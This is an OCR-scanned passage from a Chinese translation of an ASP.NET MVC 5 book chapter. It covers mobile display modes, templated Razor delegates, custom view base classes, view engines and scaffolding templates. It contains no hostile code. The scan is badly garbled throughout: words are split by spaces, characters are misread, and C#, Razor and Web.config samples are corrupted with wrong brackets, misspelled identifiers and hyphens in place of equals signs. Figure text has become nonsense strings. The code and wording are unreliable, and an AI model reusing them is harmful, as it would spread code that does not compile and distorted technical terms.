如 果 Views\Account 文 件 夹 中 包含 _SetPasswordPartial.cshtml 和 _SetPasswordPartial. 
mobile.cshtml， 那 么 对 于 来 自 移动 浏览 器 的 请 求 ， 命 令 @Html.Partial("~/Views/Account/ 
_SetPasswordPartial") 会 泻 染 _SetPasswordPartial.mobile.cshtml， 而 对 于 其 他 请 求 ， 该 命令 会 泻 
染 _SetPasswordPartial.cshtml。 


2.， 自 定义 显示 模式 


另外 ， 我 们 可 以 注册 基于 自 定义 准则 的 设备 模式 。 例 如 ， 针 对 用 于 Windows Phone 设 备 ， 
以 .WinPhone.cshtml 结 尾 的 视图 模板 ， 我 们 可 以 注册 一 个 WinPhone 设 备 模 式 。 在 Global.asax 
的 Application_Start 方 法 中 编写 如 下 代码 : 


DisplayModeProvider.Instance.Modes.Insert (0, new 
DefaultDisplayMode ("WinPhone") 


t 
ContextCondition = (context => context.GetOverriddenUserAgent ().IndexOf 
("Windows Phone OS", StringComparison.OrdinallgnoreCase) >= 0) 
); 
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添加 完 代码 之 后 即 完成 注册 。 我 们 不 需要 其 他 额外 的 配置 和 注册 。 此 时 ， 如 果 创 建 了 
以 .WinPhone.cshtml 结 尾 的 视图 ， 只 要 满足 上 下 文 条 件 ， 都 会 选择 这 些 视 图 。 

上 下 文 条 件 不 局 限于 检查 浏览 器 的 用 户 代理 ; 并 不 要 求 使 用 请 求 上 下 文 做 任何 处 理 。 我 
们 可 以 根据 用 户 cookie， 决 定 用 户 账户 类 型 的 数据 库 查 询 或 日 期 来 创建 不 同 的 显示 模式 ， 这 
完全 取决 于 我 们 自己 。 

MVC 为 我 们 提供 了 大 量 工具 来 改善 移动 浏览 器 上 的 用 户 体验 。 笔者 的 建议 是 养 成 在 移动 
浏览 器 测试 网 站 的 习惯 。 当 在 移动 浏览 器 上 浏览 ASPNET 网 站 (http://asp.net) 时 ， 我 们 会 发 现 
浏览 网 站 、 阅 读 网 站 内 容 非 常 困 难 。 我 们 通过 适应 性 呈现 可 以 极 大 地 改善 网 站 用 户 的 体验 ， 
获得 移动 访问 量 的 剧 增 。 


16.2 ”高 级 Razor 


第 3 章 重点 介绍 了 在 日 常 工作 中 可 能 用 到 的 Razor 功 能 。 此外, Razor 还 支持 一 些 附加 功能 ， 
尽管 有 点 复杂 ， 但 是 这 些 功能 很 强大 ， 所 以 很 值得 我 们 学 习 。 


16.2.1 模板 化 的 Razor 委 托 


在 有 关 Razor 布 局 的 讨论 中 , 我 们 看 到 一 种 为 要 求 样板 代码 的 可 选 布局 部 分 提供 默认 内 容 
的 方法 。 当 时 提 到 了 使 用 称 为 模板 化 Razor 委 托 (Templated Razor Delegate) 的 特性 来 创建 一 个 
更 好 的 方案 。 

Razor 可 以 把 内 嵌 的 Razor 模 板 转换 成 委托 。 下 面 的 代码 就 展示 了 一 个 这 样 的 示例 ， 

Ql 


Func«dynamic, object» strongTemplate = @<strong>@item</strong>; 
) 


使 用 Razor 模 板 生成 的 委托 是 Func<T HelperResult> 类 型 。 在 前 面 的 例子 中 ， 类 型 T 是 
dynamic. 模板 中 的 @item 参 数 是 一 个 特殊 的 神奇 参数 。 尽管 这 些 委托 只 能 有 一 个 这 样 的 参数 ， 
但 模板 可 以 根据 需要 多 次 引用 它 。 

转换 完毕 后 ， 就 可 以 在 Razor 视 图 的 任何 位 置 使 用 该 委托 了 : 


<div> 
@strongTemplate ("This is bolded.") 
</div> 


这 样 做 的 结果 是 , 我 们 可 以 编写 一 个 接收 Razor 模 板 作 为 参数 值 的 方法 , 而 只 需要 使 相应 
参数 的 类 型 是 Func<T HelperResult- HI nT . 
回 到 第 3 章 布局 示例 中 的 RenderSection 示 例 ， 我 们 编写 如 下 代码 : 


public static class RazorLayoutHelpers { 
public static HelperResult RenderSection( 
this WebPageBase webPage, 
string name, 
Func«dynamic, HelperResult» defaultContents) { 
if (webPage.IsSectionDefined(name)) { 
return webPage.RenderSection (name); 
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return defaultContents (null); 
} 


上 面 编写 的 方法 接收 一 个 节点 (section) 名 称 和 一 个 Fuanc<dynamic,HelperResult> 类 型 的 对 
象 。 因 此 ， 可 以 在 Razor 视 图 中 对 该 方法 采用 如 下 形式 的 调用 : 
<footer> 


QGthis.RenderSection("Footer", @<span>This is the default.«/span») 
«/footer» 


请 注意 ,我 们 使 用 一 小 段 Razor 代 码 把 默认 内 容 作 为 参数 传递 进 了 方法 中 。 此外， 还 应 注 
意 上 面 的 代码 中 使 用 this 参 数 来 调用 扩展 方法 RenderSection。 
当 使 用 该 类 型 中 某 个 类 型 (或 该 类 型 的 派生 类 型 ) 的 扩展 方法 时 ， 必 须 使 用 this 参 数 来 调用 
该 扩展 方法 。 当 编写 视图 时 ， 尽 管 在 类 中 编写 代码 不 太 明 显 ， 但 我 们 确实 需要 。 下 一 小 节 将 
会 对 此 做 出 解释 ， 并 提供 一 个 例子 来 梳理 RenderSection 的 用 法 。 


16.2.2 ”视图 编译 


与 许多 模板 引擎 或 视图 解释 引擎 不 同 的 是 , Razor 视 图 在 运行 时 动态 编译 成 类 , 然后 执行 。 
编译 在 视图 第 一 次 被 请 求 时 发 生 ， 这 会 引发 轻微 的 一 次 性 性 能 开销 ， 但 这 样 做 的 好 处 是 当 视 
图 再 次 被 请 求 时 ， 它 就 可 以 完全 运行 编译 后 的 代码 ， 而 不 用 再 进行 重新 编译 。 如 果 视 图 内 容 
发 生 改变 ，ASPNET 就 会 自动 重新 编译 该 视图 。 

正如 在 上 一 节 中 提 到 的 ， 由 视图 编译 生成 的 类 派生 于 WebViewPage 类 ， 而 WebViewPage 类 
是 WebPageBase 类 的 子 类 。 对 于 长 期 使 用 ASPNET 的 开发 人 员 对 这 一 点 不 应 该 感到 惊讶 ， 因 
为 这 与 ASPNET Web Forms 页 面 使 用 其 Page 基 类 的 工作 机 制 类 似 。 

我 们 可 以 把 Razor 视 图 的 基 类 修改 为 一 个 自 定义 类 , 从 而 实现 向 视图 中 添加 自 定义 的 方法 
和 属性 。Razor 视 图 的 基 类 在 Views 目 录 下 的 Web.config 文 件 中 定义 。 下 面 代 码 中 ，Web.config 
文件 中 的 节点 包含 有 Razor 配 置 : 


<system.web.webPages.razor> 
<host factoryType-"System.Web.Mvc.MvcWebRazorHostFactory, 
System.Web.Mvc, Version=3.0.0.0, 
Culture=neutral, PublicKeyToken-31BF3856AD364E35" /» 
«pages pageBaseType-"System.Web.Mvc.WebViewPage"^ 
«namespaces» 
«add namespace-"System.Web.Mvc" /» 
«add namespace-"System.Web.Mvc.Ajax" /» 
«add namespace-"System.Web.Mvc.Html" /» 
«add namespace-"System.Web.Routing" /» 
«/namespaces» 
«/pages» 
«/system.web.webPages.razor» 


注意 <pages> 元 素 ， 它 的 pageBaseType 特 性 值 指定 了 应 用 程序 中 所 有 Razor 视 图 的 基本 页 
面 类 型 。 但 是 我 们 可 以 用 自 定义 的 基 类 蔡 换 该 特性 值 。 为 了 演示 如 何 蔡 换 ， 下 面 编写 一 个 派 
生 于 WebViewPage 的 类 。 
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我 们 只 需要 向 CustomWebViewPage 类 中 添加 RenderSection 方 法 的 一 个 重 载 版 本 : 


using System; 
using System.Web.Mvc; 
using System.Web.WebPages; 


public abstract class CustomWebViewPage<T> : WebViewPage«T» { 
public HelperResult RenderSection (string name, Func«dynamic, HelperResult» 
defaultContents) ( 
if (IsSectionDefined(name)) ( 
return RenderSection (name); 
} 
return defaultContents (null); 
} 
} 


请 注意 上 面 定义 的 CustomWebViewPage 类 是 泛 型 类 型 。 这 对 于 强 类 型 视图 的 支持 非常 重 
事实 上 ， 所 有 的 视图 都 是 泛 型 类 型 。 当 不 指定 类 型 时 ， 它 的 类 型 就 是 dynamic。 
编写 完 CustomWebViewPage 类 之 后 ， 还 需要 在 Web.config 文 件 中 修改 基本 页 面 类 型 ; 


«pages pageBaseType-"CustomWebViewPage"» 


修改 完毕 后 ， 应 用 程序 中 所 有 的 Razor 视 图 将 都 派生 于 CustomWebViewPage<T> 类 ， 并 且 
拥有 新 的 RenderSection 重 载 方法 ， 从 而 可 以 在 不 要 求 this 关 键 字 的 情况 下 ， 使 用 默认 内 容 定义 
可 选 布局 节点 : 

<footer> 


GRenderSection("Footer", @<span>This is the default.«/span») 
«/footer» 


» 


注意 ”为 了 看 到 这 些 代码 和 操作 布局 ， 可 使 用 NuGet 将 Wrox.ProMvc5. 
Views.BasePageType 包 安装 到 默认 ASPNET MVC 5 项 目 中 ， 命 令 如 下 : 


Install-Package Wrox.ProMvc5.Views.BasePageType 


安装 完毕 后 ， 需 要 在 Views 目 录 下 的 Web.config 文 件 中 把 基本 页 面 类 型 改 成 | 
CustomWebViewPage. 

Views 目 录 中 的 example 文 件 夹 包含 一 个 使 用 刚才 实现 方法 的 布局 示例 。 按 
CtrltF5 快 捷 键 ， 并 访问 下 面 两 个 URL 来 看 到 代码 的 效果 : 

e /example/layoutsample 

e /example/layoutsamplemissingfooter 


16.3 ”高 级 视图 引擎 


Microsoft 社 区 程序 经 理 Scott Hanselman 喜 欢 把 视图 引擎 称 作 “只 是 一 个 尖 括 号 生成 器 ”。 
简 而 言 之 ， 的 确 如 此 。 视 图 引擎 把 内 存 中 存储 的 视图 表示 转换 成 我 们 想 要 的 任何 格式 。 通 
常情 况 下 ， 我 们 创建 的 是 包含 标记 和 脚本 的 cshtml 文 件 。ASPNET MVC 的 默认 视图 引擎 实 
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现 一 一 RazorViewEngine 利 用 一 些 已 有 的 ASPNET API 把 我 们 的 页 面 泻 染 成 HTML 。 

视图 引擎 不 局 限于 使 用 cshtml 页 面 ， 也 不 局 限于 演 染 HTML。 后 面 会 看 到 ， 如 何 创建 不 
把 输出 泻 染 成 HTML 的 视图 引擎 ， 以 及 需要 把 自 定义 领域 特定 语言 (domain-specific language; 
DSL) 作 为 输入 的 不 同 寻 常 的 视图 引擎 。 

为 更 好 地 理解 视图 引擎 的 概念 ， 让 我 们 回顾 一 下 ASPNET MVC 生 命 周 期 ， 简 化 图 如 图 
16-8 所 示 。 


) Request A Routing acce ONDES 


图 16-8 


还 有 许多 子 系统 都 在 图 16-8 中 没有 显示 出 来 。 这 个 图 只 是 为 了 说 明 什么 阶段 引入 了 视图 
引擎 一 正好 在 Controller 操 作 执行 完毕 ， 返 回 一 个 ViewResult 作 为 对 请 求 的 响应 之 后 。 

这 里 请 注意 ， 控 制 器 本 身 不 泻 染 视图 ， 它 只 是 准备 数据 (也 就 是 模型 )， 通 过 返回 的 
ViewResult 实 例 ， 决 定 显示 哪个 视图 。 正 如 本 章 前 面 介 绍 的 ，Controller 基 类 中 包含 一 个 名 为 
View 的 简便 方法 ， 用 来 返回 ViewResult。 在 底层 ，ViewResult 调 用 当前 视图 引擎 泻 染 视图 。 


16.3.1 视图 引擎 配置 


正如 刚才 提 到 的 ， 为 应 用 程序 注册 备用 视图 引擎 是 可 以 实现 的 。 在 Globalasax.cs 文 件 中 
配置 视图 引擎 。 默 认 情 况 下 ， 如 果 坚 持 继续 使 用 RazorViewEngine 和 另外 一 个 默认 注册 的 视图 
引擎 WebFormViewEngine， 就 没 必 要 注册 其 他 视图 引擎 。 

然而 ， 如 果 想 使 用 其 他 视图 引擎 蔡 换 这 些 默认 注册 的 视图 引擎 ， 我 们 可 以 在 
Application_Start 方 法 中 编写 如 下 代码 : 

protected void Application Start() ( 

ViewEngines.Engines.Clear(); 
ViewEngines.Engines.Add (new MyViewEngine()); 
//Other startup registration here 

) 

视图 引擎 是 一 个 静态 的 ViewEngineCollection 类 型 对 象 ， 可 以 包含 所 有 已 注册 的 视图 引 
擎 。 这 是 注册 视图 引擎 的 入 口 点 。 由 于 RazorViewEngine 和 WebFormViewEngine 默 认 包含 在 视 
图 引擎 集合 中 ， 因 此 ,我 们 需要 首先 调用 Clear 方 法 。 如 果 想 把 添加 的 自 定义 视图 引擎 作为 除 
了 默认 引擎 外 的 另 一 个 选项 ， 而 不 是 替换 默认 的 视图 引擎 ， 我 们 就 不 需要 调用 Clear 方 法 。 

然而 ， 在 大 多 数 情况 下 ， 我 们 不 需要 手动 注册 视图 引擎 (如 果 能 够 在 NuGet 上 获取 的 话 )。 
例如 ， 创 建 默认 的 ASPNET MVC 5 项 目 之 后 ， 为 了 使 用 Spark 视 图 引擎 ， 只 需 运 行 NuGet 命 令 
Install-Package Spark.Web.Mvc。 这 样 就 会 在 我 们 的 项 目 中 添加 和 配置 Spark 视 图 引擎 。 通 过 把 
Index.cshtml 重 命名 为 Index.spark， 我 们 可 以 快速 地 查看 到 效果 。 参 照 下 面 代码 修改 代码 ， 以 
显示 控制 器 中 定义 的 消息 : 

<!DOCTYPE html» 

«html» 

«head» 


«title»Spark Demo«/title» 
</head> 
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<body> 
«hl if-"!String.IsNullOrEmpty (ViewBag.Message)">$ {ViewBag.Message}</hl> 
<p> 
This is a spark view. 
</p> 
</body> 
</html> 


上 面 的 代码 展示 了 一 个 非常 简单 的 Spark 视 图 示例 。 请 注意 上 面 的 if 特 性， 其 中 包含 了 
一 个 决定 元 素 是 否 显示 的 Boolean 表 达 式 。 这 个 控制 标记 输出 的 声明 方法 是 Spark 的 一 个 标志 
特点 。 


16.3.2 ”查找 视图 


当 创建 自 定义 视图 引擎 时 ，IViewEngine 接 口 是 需 要 实现 的 关键 接口 。 


public interface IViewEngine ( 
ViewEngineResult FindPartialView(ControllerContext controllerContext, 
string partialViewName, bool useCache); 
ViewEngineResult FindView(ControllerContext controllerContext, 
string viewName, 
string masterName, bool useCache); 
void ReleaseView(ControllerContext controllerContext, IView view); 
r 


FindView 方 法 迭代 ViewEngineCollection 中 注册 的 视图 引擎 ， 并 在 每 个 视图 引擎 上 调用 
FindView 方 法 ， 并 把 视图 名 称 作为 参数 传 入 。 这 就 是 ViewEngineCollection 询 问 每 个 视图 引擎 
能 否 泻 染 指定 视图 的 方式 。 

FindView 方 法 返回 一 个 ViewEngineResult 实 例 ， 其 中 封装 了 问题 一 “当前 视图 引擎 能 泻 
染 这 个 视图 吗 ” 一 一 的 答案 ， 如 表 16-1 所 示 。 


表 16-1 ViewEngineResult 属 性 


属 性 d g 
View 返回 查找 的 指定 视图 名 称 的 TIView 实 例 。 如 果 找 不 到 对 应 名 称 的 视图 ， 就 返回 null 
ViewEngine 如 果 找 到 视图 ， 返 回 一 个 IViewEngine 实 例 ; 否则 返回 pull 
SearchedLocations | 返回 一 个 IEnumerable<stringe>， 其 中 包含 视图 引擎 搜索 的 所 有 位 置 


如 果 返 回 的 IView 是 null， 视 图 引擎 就 找 不 到 视图 名 称 对 应 的 视图 。 当 视图 引擎 找 不 到 视 
图 时 ， 它 会 返回 它 查 找 的 位 置 列表 。 通 常情 况 下 ， 虽 然 对 于 使 用 模板 文件 的 视图 引擎 ， 这 些 
位 置 是 文件 路 径 ， 但 它们 也 可 以 完全 是 别 的 路 径 ， 比 如 数据 库 位 置 ， 对 应 于 把 视图 存储 在 数 
据 库 中 的 视图 引擎 。 对 于 MVC 本 身 ， 这 些 位 置 字符 串 是 不 透明 的 ; MVC 只 是 使 用 这 些 位 置 
字符 串 向 开发 人 员 显示 一 个 有 帮助 的 错误 信息 。 

FindPartialView 方 法 的 工作 机 制 与 FindView 几 乎 一 样 , 只 是 它 关注 于 查找 部 分 视图 。 通常 
情况 下 ， 视 图 引擎 区 别 对 待 视 图 和 部 分 视图 。 例 如 ， 遵 照 约定 ， 一 些 视图 自动 向 当前 视图 添 
加 一 个 母 版 视图 或 布局 。 视 图 引擎 知道 它 查找 的 是 完全 视图 还 是 部 分 视图 非常 重要 ;否则 ， 
每 个 部 分 视图 都 会 被 一 个 母 版 布局 环绕 。 
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16.3.3 WAZ 


当 创 建 自 定义 视图 引擎 时 ,IView 接 口 是 我 们 需要 实现 的 第 二 个 接口 。 可喜 的 是 ， 这 个 接 


非常 简单 ， 只 包括 一 个 方法 : 


public interface IView { 
void Render(ViewContext viewContext, TextWriter writer); 


) 


自 定义 视图 提供 了 一 个 ViewContext 实 例 和 TextWriter 实 例 ， 其 中 ViewContext 中 包含 了 自 
定义 视图 引擎 需要 的 信息 。 视图 引擎 首先 期 望 视图 使 用 ViewContext 中 的 数据 ， 比 如 视图 数据 
和 模型 ， 然 后 调用 TextWriter 实 例 中 的 方法 来 呈现 输出 。 

表 16-2 列 举 了 ViewContext 的 属性 。 


属 性 
HttpContext 


Controller 

RouteData 
ViewData 
TempData 


View 
ClientValidationEnabled 
FormContext 
FormldGenerator 
IsChildAction 


ParentActionViewContext 


表 16-2 ViewContext 属 性 
dà xk 

-个 HttpContextBase 的 实例 ， 可 以 用 来 访问 ASPNET 内 部 对 象 ， 比 如 
Server、Session、Request 和 Response 

-个 ControllerBase 的 实例 ， 可 以 用 来 访问 控制 器 ， 调 用 视图 引擎 

-个 RouteData 的 实例 ， 可 以 用 来 访问 当前 请 求 的 路 由 值 

-个 ViewDataDictionary 实 例 ， 其 中 包含 控制 器 传递 给 视图 的 数据 

-个 TempDataDictionary 的 实例 , 其 中 包含 (一 个 特定 请 求 缓存 中 的 ) 控 制 
器 传递 给 视图 的 数据 

-个 IView 的 实例 ， 表 示 将 要 呈现 的 视图 

-个 Boolean 类 型 值 ， 表 示 视 图 的 客户 端 验证 是 否 启 用 
包含 在 客户 端 验证 中 使 用 的 表单 信息 
允许 我 们 重 写 表单 的 命名 方式 ， 默 认 形 式 为 “form0” 
一 个 Boolean 类 型 值 ， 表 明 操 作 是 否 作 为 调用 Html.Action 或 
Html.RenderAction 的 结果 显示 
当 IsChildAction 等 于 true 时 ， 包 含 当前 视图 父 视图 的 ViewContext 


Writer 


UnobtrusiveJavaScriptEnabled 


当 HIML 辅 助 方法 ( 即 BeginForm) 不 返回 字符 串 时 ， 该 属性 由 
HtmlTextWriter 使 用 ， 以 便 与 非 Web Fomms 视 图 引擎 保持 兼容 
这 个 属性 决定 用 户 客户 端 验证 的 非 侵入 式 方法 和 Ajax 是 否 使 用 。 当 属性 
值 为 tue 时 ， 辅 助 方法 不 向 标记 中 输出 脚本 块 ， 而 是 输出 HIML 5 data-* 
特性 ， 非 侵入 式 脚 本 使 用 该 特性 作为 向 标记 附加 行为 的 方式 


并 非 每 个 视图 呈现 时 都 需要 访问 所 有 这 些 属性 ， 但 技 多 不 压 身 ， 使 用 时 知道 它们 在 何 处 


还 是 很 好 的 。 


16.3.4 备用 视图 引擎 


当 首 次 使 用 ASPNET MVC 时 ， 我 们 可 能 想 使 用 ASPNET MVC 自 带 的 视图 引擎 : 
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RazorViewEngine。 这 样 做 具有 诸多 优势 ， 具 体 如 下 : 


e 默认 


布局 


简洁 轻 量 的 语法 


默认 HTML 编码 
支持 C# /VB 脚本 
具有 Visual Studio 中 的 智能 感知 功能 


然而 ， 也 有 很 多 次 ， 我 们 可 能 想 使 用 一 个 不 同 的 视图 引擎 一 一 例如 ， 当 我 们 : 

e 想 使 用 不 同 的 语言 ， 比 如 Ruby 或 Python 

e 泻 染 非 HITML 格 式 的 输出 ， 比 如 图 形 、PDF 和 RSS 等 

e 拥有 使 用 另 一 种 格式 的 遗留 模板 

在 编写 本 段 时 ， 已 经 可 以 获取 一 些 第 三 方 视 图 引擎 。 表 16-3 列 举 了 一 些 较 知名 的 视图 引 
擎 ， 但 也 存在 许多 其 他 我 们 没有 听 过 的 视图 引擎 。 


视图 引擎 
Spark 


NHaml 


Brail 


StringTemplate 


Nustache 


表 16-3 ”视图 引擎 属性 
d 述 

Spark(https://github.com/SparkViewEngine) 是 Louis DeJardin( 现 在 是 微软 员工 ) 的 作 
品 ， 主 要 开发 用 于 支持 MonoRail 和 ASP.NET MVC。Spark 是 值得 注意 的 ， 因 为 它 使 
用 声明 式 语法 泻 染 视图 , 使 得 标记 和 代码 之 间 的 界限 变 得 模糊 。Spark 继 续 添加 革新 
的 功能 ， 其 中 包括 对 Jade 模 板 语言 (最 先 在 Nodejs 上 普及 ) 的 支持 
NHaml( 托 管 在 GitHub 上， 网 址 https:;//github.com/NHaml/NHaml) 由 Andrew Peters 在 
2007 年 12 月 创建 ， 并 发 布 在 他 的 博客 上 ， 是 流行 的 Ruby on Rails Haml 视 图 引擎 的 一 
个 端口 。DHaml 是 一 个 非常 简洁 的 DSL， 可 以 使 用 最 少 的 字符 描述 XHTML 的 结构 
Brail(MvcContrib 项 目的 一 部 分 ， http://mvecontrib.org) 有 趣 的 是 它 使 用 Boo 语 言 。 Boo 
是 一 种 面向 对 象 的 静态 类 型 语言 ， 因 为 CLR 使 用 Python 语 言 风格 ， 比 如 有 语法 意义 
的 空格 
StringTemplate 是 一 个 轻 量 级 的 模板 引擎 (托管 在 Google 代码 ， 
http://code.google.com/p/string-template-view-engine-mvc)， 它 基于 Java StringTemplate 
引擎 解释 执行 而 非 编译 执行 
Nustache(https://github.conyjdiamond/Nustache) 是 流行 的 Mustache 模 板 语 言 的 .NET 实 
现 ， 如 此 命名 ， 是 因为 它 使 用 花 括 号 ， 而 从 形状 上 看 ， 花 括号 像 竖 起 来 的 胡子 。 由 
于 Nustache 有 意 不 支持 控制 流 语句 ， 因 此 它 被 称 为 是 一 个 缺少 逻辑 的 模板 系统 。 
Nustache 项 目 包括 一 个 MVC 视 图 引擎 
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Parrot 


JavaScript View 


Engine(JSVE) 


Parrot(http://thisisparrot.com) 是 一 个 有 趣 的 视图 引擎 ， 拥 有 CSS 视 图 语法 ， 能 够 很 好 
地 支持 枚 举 和 翌 套 对 象 ， 是 一 个 可 扩展 的 泻 染 系统 

JavaScript View Engine(https://github.com/Buildstarted/Javascript.ViewEngines) 是 另外 
一 个 新 视图 引擎 ， 由 Parrot 的 作者 Ben Dornis 创 建 。 这 是 一 个 用 于 常见 的 JavaScript 
模板 系统 (如 Mustache 和 Handlebars) 的 可 扩展 的 视图 引擎 。 这 种 公共 实现 的 优点 在 
于 ， 要 添加 对 另外 一 个 模板 系统 的 支持 ， 只 需要 在 Scripts 目 录 下 添加 对 应 的 
JavaScript 文 件 ， 并 在 JavaScript.ViewEngines.js 文 件 中 进行 注册 即 可 
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16.3.5 “新 视图 引擎 还 是 新 ActionResult 


我 们 会 经 常 碰 到 这 样 的 问题 ， 是 创建 一 个 自 定义 视图 引擎 还 是 创建 一 个 新 ActionResult 
类 型 。 例 如 ， 我 们 想 返 回 一 个 自 定义 XML 格式 的 对 象 。 此 时 ， 我 们 应 该 编写 一 个 自 定 义 的 视 
引擎 ， 还 是 创建 一 个 新 的 MyCustomXmlFormatActionResult 呢 ? 

在 一 个 与 另 一 个 之 间 做 出 选择 时 ， 一 般 的 经 验 法 则 是 它 是 否 有 某 种 形式 的 模板 文件 对 标 
记 演 染 具 有 指导 意义 。 如 果 只 有 一 种 方法 能 把 对 象 转换 为 输出 格式 ， 那 么 编写 自 定义 
ActionResult 类 型 会 更 有 意义 。 

例如 ，ASPNET MVC Framework 包 括 的 JsonResult 可 以 用 来 把 一 个 对 象 序列 化 为 JSON 语 
法 格式 。 通 常情 况 下 , 只 有 一 种 方式 能 够 把 对 象 序列 化 为 JSON。 根据 返回 的 操作 方法 和 视图 ， 
我 们 不 能 改变 同样 对 象 到 JSON 的 序列 化 。 序 列 化 过 程 一 般 不 能 通过 模板 控制 。 

然而 ， 假 设 我 们 想 使 用 XSLT 把 XML 转换 成 HTML。 依 据 调用 的 操作 ， 我 们 可 以 使 用 多 
种 方式 把 同样 的 XML 转换 成 HIML。 在 这 种 情况 下 ， 我 们 可 以 创建 一 个 使 用 XSLT 文 件 作为 
视图 模板 的 XsltViewEngine。 


16.4 BRER 


第 4 章 综述 了 基 架 视图 在 MVC 5 中 的 用 法 ， 这 个 特性 使 得 创建 控制 器 和 视图 变 得 容易 ， 
我 们 只 需要 在 Add Controller 对 话 框 中 设置 相应 选项 就 可 以 实现 创建 、 读 取 、 更 新 和 删除 功能 。 
正如 第 4 章 中 提 到 的 ， 基 架 系统 是 可 扩展 的 。 本 节 介 绍 了 扩展 默认 基 架 系统 的 一 些 方法 。 


16.4.1 ASPNET 基 架 简 介 


虽然 从 MVC 第 一 次 发 布 以 来 ， 基 架 就 是 MVC 的 一 部 分 ， 但 是 以 前 ， 基 架 只 能 用 于 MVC 
项 目 。 随 着 Visual Studio 2013 的 发 布 ， 基 架 被 作为 一 种 新 功能 重新 编写 ， 名 字 改 为 ASPNET 
AE. 

顾名思义 ，ASPNET 基 架 现在 可 在 所 有 ASPNET 应 用 程序 中 使 用 ， 而 不 是 只 能 用 于 MVC 
项 目 。 这 就 意味 着 我 们 可 以 在 任何 ASPNET 项 目 中 添加 任意 默认 的 基 架 模板 ， 例 如， 在 使 用 
ASP.NET Web Forms 或 者 Empty 模板 创建 的 项 目 中 ， 可 以 添加 基 架 MVC 控 制 器 和 视图 。 

以 前 的 MVC 基 架 系统 允许 一 定 的 自 定义 , 而 新 的 ASPNET 基 架 系 统 在 设计 时 就 考虑 到 了 
自 定义 。 自 定义 方法 有 以 下 两 种 : 

e 基 架 模板 自 定义 ”允许 我 们 修改 使 用 现 有 基 架 器 生成 的 代码 。 

e 自 定义 基 架 器 ”允许 我 们 向 Add New Scaffold 对 话 框 添加 新 基 架 。 


16.4.2” 自 定义 基 架 模板 
默认 基 架 器 使 用 Text Template Transformation Toolkit( 通 常 称 为 T4) 生 成 代码 。T4 是 一 个 


集成 到 Visual Studio 中 的 代码 生成 器 引擎 。 顾名思义 ，T4 模 板 的 格式 是 基于 文本 的 ， 所 以 相对 
容易 编辑 。T4 模 板 使 用 与 原来 的 Web Forms 视 图 语法 相当 类 似 的 语法 ， 混 杂 包含 了 字符 串 字 
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值 和 C# 代 码 。 在 此 网 址 可 获取 关于 T4 系 统 和 语法 的 更 多 信息 : http://msdn.microsoft.com/ 
en-us/library/bb126445.aspx . 


注意 Visual Studio 把 T4 模 板 ( 扩 展 名 为 .4 的 文件 ) 显 示 为 纯 文本 。 存 在 一 些 
Visual Studio 扩 展 ， 可 以 向 Visual Studio 2013 添 加 增强 的 T4 支 持 。 这 些 扩展 通常 
会 添加 语法 高 亮 显示 和 智能 感知 ， 以 及 其 他 多 种 有 用 的 功能 。 笔 者 建议 在 Visual 
Studio Gallery(http://visualstudiogallery.msdn.microsoft.com/) 上 搜索 T4， 并 自己 尝 
试 几 个 。 


假设 Visual Studio 2013 的 安装 目录 是 C:\Program Files (x86)\Microsoft Visual Studio 12.0, 
可 在 下 面 的 位 置 查找 默认 模板 : C:\Program Files (x86)\Microsoft Visual Studio 12.0!Common7 
IDE Extensions Microsoft Web Mve Scaffolding Templates 。 

最 好 不 要 修改 基本 模板 ， 因 为 所 做 修改 会 影响 到 计算 机 上 的 所 有 项 目 。 基 架 系 统 允 许 在 
单独 项 目 中 覆盖 基 架 模板 ， 这 样 带 来 的 好 处 是 我 们 能 够 把 修改 后 的 基 架 模板 签 入 到 源 代码 控 
制 中 。 

ASPNET 基 架 首 先 查 找 项 目 中 的 CodeTemplates 文 件 夹 ， 因 此 ， 如 果 需 要 自 定义 新 模板 ， 
我 们 可 以 在 项 目的 根 目录 下 创建 一 个 新 的 CodeTemplates 目 录 ， 并 将 上 述 模板 复制 到 该 目录 
中 。 注 意 模板 既 有 C# 版 本 ， 又 有 VB.NET 版 本 ， 所 以 我 们 需要 删除 自己 没有 使 用 的 语言 所 对 
应 的 文件 。 

在 应 用 程序 中 添加 基 架 模板 的 更 好 方法 是 使 用 一 个 Visual Studio 扩 展 ， 叫 做 SideWaffle。 
使 用 SideWaffle 时 ， 在 项 目 中 添加 代码 段 、 项 目 模 板 和 项 模板 十 分 容易 。SideWaffle 网 站 
(http://sidewaffle.com) 提 供 了 更 多 信息 ， 以 及 可 用 模板 的 列表 和 扩展 的 下 载 链接 。 安 装 了 
SideWaffle 以 后 ， 可 以 将 CodeTemplates 目 录 添 加 到 任何 项 目 中 ， 方 法 是 : 在 Add | New Item 对 
话 框 中 ,选择 Web | SideWaffle 组 ， 然 后 选择 ASPNET Scaffolding T4 files 模 板 ， 如 图 16-9 所 示 。 
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Click here tc go online and find templates. 
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图 16-9 


此 选项 在 应 用 程序 中 添加 一 个 CodeTemplates 文 件 夹 ， 其 中 包含 所 有 标准 的 MVC 基 架 模 
板 。 在 该 文件 夹 下 可 双击 模板 进行 修改 ， 如 图 16-10 所 示 。 
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using Systems 
using Systen:CollectionsGeneric; 
using Systes.Lina; 
using Systen.web; 
uzing Systen,Meb.Pves 
namespace #8 Namespace #3 
public class ds Controllertsee $$ + Controller 
{ 
—————r—— 
public actiontesult Index() 


return Ves); 


ws a 


图 16-10 
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Butter Graphi tangibieta Tessuto = A P Poro X —— SOLser soho. Temi. Severi. Note. 


要 添加 新 基 架 模板 ， 只 需要 复制 粘贴 某 个 现 有 模板 ， 根 据 需要 在 对 话 框 中 显示 的 名 称 重 


命名 该 模板 ， 然 后 修改 模板 代码 即 可 。 例 如 ， 如 果 在 删除 操作 后 经 常 显示 一 个 删除 成 功 视图 ， 


就 可 以 复制 /CodeTemplates/MvcView 下 的 某 个 模板 ， 并 将 其 重 命 名 为 
/CodeTemplates/MvcView/DeleteSuccess.cs.t4。 修 改 这 个 新 模板 的 代码 ， 然 后 保存 。 现 在 ， 每 


Bü eee acl uf DeleteSuccess 就 会 显示 在 模板 列表 中 ， 如 图 16-11 所 示 。 
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自 定义 基 架 模板 是 提高 整个 团队 效率 的 一 种 容易 而 且 风 险 很 低 的 方式 。 如 果 发 现 自 定义 


模板 不 能 工作 ， 只 需要 从 项 目 中 删除 CodeTemplates 目 录 ， 返 回 默认 行为 即 可 。 
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164.3 ” 自 定义 基 架 器 


基 架 系统 允许 广泛 地 自 定义 ， 远 不 止 是 自 定义 基 架 模板 。 自 定义 基 架 器 允许 任何 Visual 
Studio 扩 展 (VSIX) 使 用 基 架 API 接 口 进行 编码 ， 并 将 其 基 架 添加 到 Add | New Scaffolded Item 对 
